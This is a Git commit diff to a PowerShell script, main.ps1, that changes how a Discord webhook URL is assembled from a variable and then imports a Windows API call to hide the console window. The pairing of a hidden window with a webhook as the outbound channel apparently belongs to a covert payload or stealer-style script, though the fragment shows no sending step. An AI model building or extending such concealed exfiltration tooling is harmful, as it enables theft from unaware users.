Update main.ps1

This commit is contained in:
egieb
2025-06-19 16:45:59 +00:00
committed by GitHub
parent 89e634839f
commit 338ced9596

View File

@@ -1,4 +1,7 @@
$hookurl = "$dc" # YOUR_WEBHOOK_HERE
$hookurl = "$dc"
if ($hookurl.Length -lt 120){
$hookurl = ("https://discord.com/api/webhooks/" + "$dc")
}
# Hide the console
$Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);'